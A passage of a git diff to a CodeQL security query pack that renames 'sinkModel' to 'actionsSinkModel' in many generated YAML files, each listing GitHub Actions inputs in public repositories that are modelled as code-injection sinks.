pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["swagger-api/swagger-codegen", "*", "input.options", "code-injection", "generated"] - ["swagger-api/swagger-codegen", "*", "input.spec-url", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/swagger-api_swagger-parser.model.yml b/ql/lib/ext/generated/composite-actions/swagger-api_swagger-parser.model.yml index 37e39efd243..0ee56c05777 100644 --- a/ql/lib/ext/generated/composite-actions/swagger-api_swagger-parser.model.yml +++ b/ql/lib/ext/generated/composite-actions/swagger-api_swagger-parser.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["swagger-api/swagger-parser", "*", "input.logsPath", "code-injection", "generated"] - ["swagger-api/swagger-parser", "*", "input.parserSpecPath", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/tarantool_tarantool.model.yml b/ql/lib/ext/generated/composite-actions/tarantool_tarantool.model.yml index 9569d47329f..f17216cf1e8 100644 --- a/ql/lib/ext/generated/composite-actions/tarantool_tarantool.model.yml +++ b/ql/lib/ext/generated/composite-actions/tarantool_tarantool.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["tarantool/tarantool", "*", "input.source", "code-injection", "generated"] - ["tarantool/tarantool", "*", "input.chat-id", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/telepresenceio_telepresence.model.yml b/ql/lib/ext/generated/composite-actions/telepresenceio_telepresence.model.yml index 6cf5dd84fbd..551010c6634 100644 --- a/ql/lib/ext/generated/composite-actions/telepresenceio_telepresence.model.yml +++ b/ql/lib/ext/generated/composite-actions/telepresenceio_telepresence.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["telepresenceio/telepresence", "*", "input.release_version", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/tensorflow_datasets.model.yml b/ql/lib/ext/generated/composite-actions/tensorflow_datasets.model.yml index ce09307f8fb..bd64e336c17 100644 --- a/ql/lib/ext/generated/composite-actions/tensorflow_datasets.model.yml +++ b/ql/lib/ext/generated/composite-actions/tensorflow_datasets.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["tensorflow/datasets", "*", "input.extras", "code-injection", "generated"] - ["tensorflow/datasets", "*", "input.tf-version", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/texstudio-org_texstudio.model.yml b/ql/lib/ext/generated/composite-actions/texstudio-org_texstudio.model.yml index 183319e32ff..7d545451867 100644 --- a/ql/lib/ext/generated/composite-actions/texstudio-org_texstudio.model.yml +++ b/ql/lib/ext/generated/composite-actions/texstudio-org_texstudio.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["texstudio-org/texstudio", "*", "input.file", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/toeverything_affine.model.yml b/ql/lib/ext/generated/composite-actions/toeverything_affine.model.yml index d8fb3f98b09..1ad4a2b824d 100644 --- a/ql/lib/ext/generated/composite-actions/toeverything_affine.model.yml +++ b/ql/lib/ext/generated/composite-actions/toeverything_affine.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["toeverything/affine", "*", "input.extra-flags", "code-injection", "generated"] - ["toeverything/affine", "*", "input.nmHoistingLimits", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/treeverse_lakefs.model.yml b/ql/lib/ext/generated/composite-actions/treeverse_lakefs.model.yml index c0c663e69f3..60381d41f16 100644 --- a/ql/lib/ext/generated/composite-actions/treeverse_lakefs.model.yml +++ b/ql/lib/ext/generated/composite-actions/treeverse_lakefs.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["treeverse/lakefs", "*", "input.compose-flags", "code-injection", "generated"] - ["treeverse/lakefs", "*", "input.compose-directory", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/trezor_trezor-firmware.model.yml b/ql/lib/ext/generated/composite-actions/trezor_trezor-firmware.model.yml index 35c0d80a115..ac61ed797d5 100644 --- a/ql/lib/ext/generated/composite-actions/trezor_trezor-firmware.model.yml +++ b/ql/lib/ext/generated/composite-actions/trezor_trezor-firmware.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["trezor/trezor-firmware", "*", "input.lang", "code-injection", "generated"] - ["trezor/trezor-firmware", "*", "input.model", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/tribler_tribler.model.yml b/ql/lib/ext/generated/composite-actions/tribler_tribler.model.yml index dc1dcff0b15..7eed41f755e 100644 --- a/ql/lib/ext/generated/composite-actions/tribler_tribler.model.yml +++ b/ql/lib/ext/generated/composite-actions/tribler_tribler.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["tribler/tribler", "*", "input.libsodium-version", "code-injection", "generated"] - ["tribler/tribler", "*", "input.command", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/trunk-io_trunk-action.model.yml b/ql/lib/ext/generated/composite-actions/trunk-io_trunk-action.model.yml index 2da63c894fc..f977f6a5cce 100644 --- a/ql/lib/ext/generated/composite-actions/trunk-io_trunk-action.model.yml +++ b/ql/lib/ext/generated/composite-actions/trunk-io_trunk-action.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["trunk-io/trunk-action", "*", "input.tools", "code-injection", "generated"] - ["trunk-io/trunk-action", "*", "input.post-init", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/unidata_metpy.model.yml b/ql/lib/ext/generated/composite-actions/unidata_metpy.model.yml index 3dc87b3ed76..c4bacdc9c2c 100644 --- a/ql/lib/ext/generated/composite-actions/unidata_metpy.model.yml +++ b/ql/lib/ext/generated/composite-actions/unidata_metpy.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["unidata/metpy", "*", "input.key", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/unstructured-io_unstructured.model.yml b/ql/lib/ext/generated/composite-actions/unstructured-io_unstructured.model.yml index 94a140a9fe1..f4ee4920797 100644 --- a/ql/lib/ext/generated/composite-actions/unstructured-io_unstructured.model.yml +++ b/ql/lib/ext/generated/composite-actions/unstructured-io_unstructured.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["unstructured-io/unstructured", "*", "input.python-version", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/vercel_turbo.model.yml b/ql/lib/ext/generated/composite-actions/vercel_turbo.model.yml index d8f78274623..5fae95e5def 100644 --- a/ql/lib/ext/generated/composite-actions/vercel_turbo.model.yml +++ b/ql/lib/ext/generated/composite-actions/vercel_turbo.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["vercel/turbo", "*", "input.extra-flags", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/vesoft-inc_nebula.model.yml b/ql/lib/ext/generated/composite-actions/vesoft-inc_nebula.model.yml index f539135bba0..4115d6c98f7 100644 --- a/ql/lib/ext/generated/composite-actions/vesoft-inc_nebula.model.yml +++ b/ql/lib/ext/generated/composite-actions/vesoft-inc_nebula.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["vesoft-inc/nebula", "*", "input.target-path", "code-injection", "generated"] - ["vesoft-inc/nebula", "*", "input.bucket", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/vkcom_vkui.model.yml b/ql/lib/ext/generated/composite-actions/vkcom_vkui.model.yml index cc8a7f16492..536b37131c1 100644 --- a/ql/lib/ext/generated/composite-actions/vkcom_vkui.model.yml +++ b/ql/lib/ext/generated/composite-actions/vkcom_vkui.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["vkcom/vkui", "*", "input.next_version", "code-injection", "generated"] - ["vkcom/vkui", "*", "input.package_name", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/vuetifyjs_vuetify.model.yml b/ql/lib/ext/generated/composite-actions/vuetifyjs_vuetify.model.yml index ec1ed14fed5..54f72118d87 100644 --- a/ql/lib/ext/generated/composite-actions/vuetifyjs_vuetify.model.yml +++ b/ql/lib/ext/generated/composite-actions/vuetifyjs_vuetify.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["vuetifyjs/vuetify", "*", "input.name", "code-injection", "generated"] - ["vuetifyjs/vuetify", "*", "input.path", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/wagoodman_dive.model.yml b/ql/lib/ext/generated/composite-actions/wagoodman_dive.model.yml index 18b37d3c658..bed9ae53110 100644 --- a/ql/lib/ext/generated/composite-actions/wagoodman_dive.model.yml +++ b/ql/lib/ext/generated/composite-actions/wagoodman_dive.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["wagoodman/dive", "*", "input.bootstrap-apt-packages", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/walletconnect_walletconnectswiftv2.model.yml b/ql/lib/ext/generated/composite-actions/walletconnect_walletconnectswiftv2.model.yml index c1699ec6816..7e9f4e14e85 100644 --- a/ql/lib/ext/generated/composite-actions/walletconnect_walletconnectswiftv2.model.yml +++ b/ql/lib/ext/generated/composite-actions/walletconnect_walletconnectswiftv2.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["walletconnect/walletconnectswiftv2", "*", "input.js-client-api-host", "code-injection", "generated"] - ["walletconnect/walletconnectswiftv2", "*", "input.project-id", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/wazuh_wazuh.model.yml b/ql/lib/ext/generated/composite-actions/wazuh_wazuh.model.yml index 0fe9b73b6de..3a16fc74bb6 100644 --- a/ql/lib/ext/generated/composite-actions/wazuh_wazuh.model.yml +++ b/ql/lib/ext/generated/composite-actions/wazuh_wazuh.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["wazuh/wazuh", "*", "input.target", "code-injection", "generated"] - ["wazuh/wazuh", "*", "input.doxygen_config", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/web-infra-dev_rspack.model.yml b/ql/lib/ext/generated/composite-actions/web-infra-dev_rspack.model.yml index 27a5defa298..686f1013dd8 100644 --- a/ql/lib/ext/generated/composite-actions/web-infra-dev_rspack.model.yml +++ b/ql/lib/ext/generated/composite-actions/web-infra-dev_rspack.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["web-infra-dev/rspack", "*", "input.post", "code-injection", "generated"] - ["web-infra-dev/rspack", "*", "input.profile", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/webassembly_wabt.model.yml b/ql/lib/ext/generated/composite-actions/webassembly_wabt.model.yml index 05fd2667812..6a6cb61c174 100644 --- a/ql/lib/ext/generated/composite-actions/webassembly_wabt.model.yml +++ b/ql/lib/ext/generated/composite-actions/webassembly_wabt.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["webassembly/wabt", "*", "input.os", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/wntrblm_nox.model.yml b/ql/lib/ext/generated/composite-actions/wntrblm_nox.model.yml index 5a91e3cd32f..513cd4d7644 100644 --- a/ql/lib/ext/generated/composite-actions/wntrblm_nox.model.yml +++ b/ql/lib/ext/generated/composite-actions/wntrblm_nox.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["wntrblm/nox", "*", "input.python-versions", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/xrplf_rippled.model.yml b/ql/lib/ext/generated/composite-actions/xrplf_rippled.model.yml index bb632423a1c..2855a6d4e01 100644 --- a/ql/lib/ext/generated/composite-actions/xrplf_rippled.model.yml +++ b/ql/lib/ext/generated/composite-actions/xrplf_rippled.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["xrplf/rippled", "*", "input.configuration", "code-injection", "generated"] - ["xrplf/rippled", "*", "input.cmake-target", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/zcash_zcash.model.yml b/ql/lib/ext/generated/composite-actions/zcash_zcash.model.yml index dca76acdc27..78a2cc4e0ce 100644 --- a/ql/lib/ext/generated/composite-actions/zcash_zcash.model.yml +++ b/ql/lib/ext/generated/composite-actions/zcash_zcash.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["zcash/zcash", "*", "input.destination", "code-injection", "generated"] - ["zcash/zcash", "*", "input.remove-first-if-exists", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/zenml-io_zenml.model.yml b/ql/lib/ext/generated/composite-actions/zenml-io_zenml.model.yml index c0e357715de..8db73d2fc77 100644 --- a/ql/lib/ext/generated/composite-actions/zenml-io_zenml.model.yml +++ b/ql/lib/ext/generated/composite-actions/zenml-io_zenml.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["zenml-io/zenml", "*", "input.install_integrations", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/zeroc-ice_ice.model.yml b/ql/lib/ext/generated/composite-actions/zeroc-ice_ice.model.yml index 2bc23972e78..8b0deda070d 100644 --- a/ql/lib/ext/generated/composite-actions/zeroc-ice_ice.model.yml +++ b/ql/lib/ext/generated/composite-actions/zeroc-ice_ice.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["zeroc-ice/ice", "*", "input.flags", "code-injection", "generated"] - ["zeroc-ice/ice", "*", "input.make_flags", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/0xpolygon_polygon-edge.model.yml b/ql/lib/ext/generated/reusable-workflows/0xpolygon_polygon-edge.model.yml index 740bfd26d69..3f7a7e7fda8 100644 --- a/ql/lib/ext/generated/reusable-workflows/0xpolygon_polygon-edge.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/0xpolygon_polygon-edge.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["0xpolygon/polygon-edge/.github/workflows/loadtest.yml", "*", "input.scenario", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/8vim_8vim.model.yml b/ql/lib/ext/generated/reusable-workflows/8vim_8vim.model.yml index f3bfa556ee5..9746a118691 100644 --- a/ql/lib/ext/generated/reusable-workflows/8vim_8vim.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/8vim_8vim.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["8vim/8vim/.github/workflows/publish.yaml", "*", "input.version_code", "code-injection", "generated"] - ["8vim/8vim/.github/workflows/publish.yaml", "*", "input.version_name", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/actions_reusable-workflows.model.yml b/ql/lib/ext/generated/reusable-workflows/actions_reusable-workflows.model.yml index f8c4e3c68be..6208645b1b7 100644 --- a/ql/lib/ext/generated/reusable-workflows/actions_reusable-workflows.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/actions_reusable-workflows.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["actions/reusable-workflows/.github/workflows/update-config-files.yml", "*", "input.base-pr-branch", "code-injection", "generated"] - ["actions/reusable-workflows/.github/workflows/update-config-files.yml", "*", "input.head-pr-branch", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/adap_flower.model.yml b/ql/lib/ext/generated/reusable-workflows/adap_flower.model.yml index 793136cc3d3..e66e7326701 100644 --- a/ql/lib/ext/generated/reusable-workflows/adap_flower.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/adap_flower.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["adap/flower/.github/workflows/_docker-build.yml", "*", "input.namespace-repository", "code-injection", "generated"] - ["adap/flower/.github/workflows/_docker-build.yml", "*", "input.file-dir", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/aio-libs_multidict.model.yml b/ql/lib/ext/generated/reusable-workflows/aio-libs_multidict.model.yml index e46601a7bff..471ce3a672a 100644 --- a/ql/lib/ext/generated/reusable-workflows/aio-libs_multidict.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/aio-libs_multidict.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["aio-libs/multidict/.github/workflows/reusable-build-wheel.yml", "*", "input.wheel-tags-to-skip", "code-injection", "generated"] - ["aio-libs/multidict/.github/workflows/reusable-build-wheel.yml", "*", "input.qemu", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/aio-libs_yarl.model.yml b/ql/lib/ext/generated/reusable-workflows/aio-libs_yarl.model.yml index 558ff908edf..1af30be9f35 100644 --- a/ql/lib/ext/generated/reusable-workflows/aio-libs_yarl.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/aio-libs_yarl.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["aio-libs/yarl/.github/workflows/reusable-build-wheel.yml", "*", "input.wheel-tags-to-skip", "code-injection", "generated"] - ["aio-libs/yarl/.github/workflows/reusable-build-wheel.yml", "*", "input.qemu", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/airbytehq_airbyte.model.yml b/ql/lib/ext/generated/reusable-workflows/airbytehq_airbyte.model.yml index a477e289d9e..ee3d9d0a8ef 100644 --- a/ql/lib/ext/generated/reusable-workflows/airbytehq_airbyte.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/airbytehq_airbyte.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["airbytehq/airbyte/.github/workflows/connector-performance-command.yml", "*", "input.connector", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/alphagov_collections.model.yml b/ql/lib/ext/generated/reusable-workflows/alphagov_collections.model.yml index a72ace81445..493594e3b81 100644 --- a/ql/lib/ext/generated/reusable-workflows/alphagov_collections.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/alphagov_collections.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["alphagov/collections/.github/workflows/pact-verify.yml", "*", "input.pact_artifact_file_to_verify", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/alphagov_frontend.model.yml b/ql/lib/ext/generated/reusable-workflows/alphagov_frontend.model.yml index 26c0794a19c..a437581ba83 100644 --- a/ql/lib/ext/generated/reusable-workflows/alphagov_frontend.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/alphagov_frontend.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["alphagov/frontend/.github/workflows/pact-verify.yml", "*", "input.pact_artifact_file_to_verify", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/alphagov_publishing-api.model.yml b/ql/lib/ext/generated/reusable-workflows/alphagov_publishing-api.model.yml index 5ad39d5e184..489e005cc0e 100644 --- a/ql/lib/ext/generated/reusable-workflows/alphagov_publishing-api.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/alphagov_publishing-api.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["alphagov/publishing-api/.github/workflows/pact-verify.yml", "*", "input.pact_artifact_file_to_verify", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/apache_druid.model.yml b/ql/lib/ext/generated/reusable-workflows/apache_druid.model.yml index 3c790f81d74..3a0e723e9f7 100644 --- a/ql/lib/ext/generated/reusable-workflows/apache_druid.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/apache_druid.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["apache/druid/.github/workflows/reusable-unit-tests.yml", "*", "input.module", "code-injection", "generated"] - ["apache/druid/.github/workflows/reusable-unit-tests.yml", "*", "input.jdk", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/apache_flink.model.yml b/ql/lib/ext/generated/reusable-workflows/apache_flink.model.yml index 50fdcfd5a2d..893be8a2725 100644 --- a/ql/lib/ext/generated/reusable-workflows/apache_flink.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/apache_flink.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["apache/flink/.github/workflows/template.flink-ci.yml", "*", "input.environment", "code-injection", "generated"] - ["apache/flink/.github/workflows/template.flink-ci.yml", "*", "input.workflow-caller-id", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/apache_spark.model.yml b/ql/lib/ext/generated/reusable-workflows/apache_spark.model.yml index 6363564503c..75877fa48aa 100644 --- a/ql/lib/ext/generated/reusable-workflows/apache_spark.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/apache_spark.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["apache/spark/.github/workflows/build_and_test.yml", "*", "input.branch", "code-injection", "generated"] - ["apache/spark/.github/workflows/build_and_test.yml", "*", "input.jobs", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/argilla-io_argilla.model.yml b/ql/lib/ext/generated/reusable-workflows/argilla-io_argilla.model.yml index fce736676fe..489e6134eba 100644 --- a/ql/lib/ext/generated/reusable-workflows/argilla-io_argilla.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/argilla-io_argilla.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["argilla-io/argilla/.github/workflows/run-python-tests.yml", "*", "input.pytestArgs", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/argoproj_argo-cd.model.yml b/ql/lib/ext/generated/reusable-workflows/argoproj_argo-cd.model.yml index 593322a739e..4feef931f71 100644 --- a/ql/lib/ext/generated/reusable-workflows/argoproj_argo-cd.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/argoproj_argo-cd.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["argoproj/argo-cd/.github/workflows/image-reuse.yaml", "*", "input.docker_image_name", "code-injection", "generated"] - ["argoproj/argo-cd/.github/workflows/image-reuse.yaml", "*", "input.ghcr_image_name", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/argoproj_argo-rollouts.model.yml b/ql/lib/ext/generated/reusable-workflows/argoproj_argo-rollouts.model.yml index b3984a7ab83..189cd8bbafd 100644 --- a/ql/lib/ext/generated/reusable-workflows/argoproj_argo-rollouts.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/argoproj_argo-rollouts.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["argoproj/argo-rollouts/.github/workflows/image-reuse.yaml", "*", "input.docker_image_name", "code-injection", "generated"] - ["argoproj/argo-rollouts/.github/workflows/image-reuse.yaml", "*", "input.ghcr_image_name", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/aws-amplify_amplify-ui.model.yml b/ql/lib/ext/generated/reusable-workflows/aws-amplify_amplify-ui.model.yml index a6f1bd4569d..418694a596d 100644 --- a/ql/lib/ext/generated/reusable-workflows/aws-amplify_amplify-ui.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/aws-amplify_amplify-ui.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["aws-amplify/amplify-ui/.github/workflows/reusable-tagged-publish.yml", "*", "input.dist-tag", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/azure_apiops.model.yml b/ql/lib/ext/generated/reusable-workflows/azure_apiops.model.yml index b661a1fa26a..10c4f8a3e3c 100644 --- a/ql/lib/ext/generated/reusable-workflows/azure_apiops.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/azure_apiops.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["azure/apiops/tools/github_workflows/run-publisher-with-env.yaml", "*", "input.API_MANAGEMENT_SERVICE_OUTPUT_FOLDER_PATH", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/azure_mlops-templates.model.yml b/ql/lib/ext/generated/reusable-workflows/azure_mlops-templates.model.yml index 0f58971041d..1837a505499 100644 --- a/ql/lib/ext/generated/reusable-workflows/azure_mlops-templates.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/azure_mlops-templates.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["azure/mlops-templates/.github/workflows/tf-gha-install-terraform.yml", "*", "input.terraform_workingdir", "code-injection", "generated"] - ["azure/mlops-templates/.github/workflows/run-pipeline.yml", "*", "input.parameters-file", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/bbq-beets_avocaddo-cmw.model.yml b/ql/lib/ext/generated/reusable-workflows/bbq-beets_avocaddo-cmw.model.yml index f12a337d71d..094e4602e8e 100644 --- a/ql/lib/ext/generated/reusable-workflows/bbq-beets_avocaddo-cmw.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/bbq-beets_avocaddo-cmw.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["bbq-beets/avocaddo-cmw/.github/workflows/mobile-ci-cd.yml", "*", "input.git-user-email", "code-injection", "generated"] - ["bbq-beets/avocaddo-cmw/.github/workflows/mobile-ci-cd.yml", "*", "input.git-user-name", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/bbq-beets_mobile-ci-cd.model.yml b/ql/lib/ext/generated/reusable-workflows/bbq-beets_mobile-ci-cd.model.yml index 76796b4ae38..ec264f96bf1 100644 --- a/ql/lib/ext/generated/reusable-workflows/bbq-beets_mobile-ci-cd.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/bbq-beets_mobile-ci-cd.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["bbq-beets/mobile-ci-cd/.github/workflows/mobile-ci-cd.yml", "*", "input.git-user-email", "code-injection", "generated"] - ["bbq-beets/mobile-ci-cd/.github/workflows/mobile-ci-cd.yml", "*", "input.git-user-name", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/bbq-beets_yujincat-action.model.yml 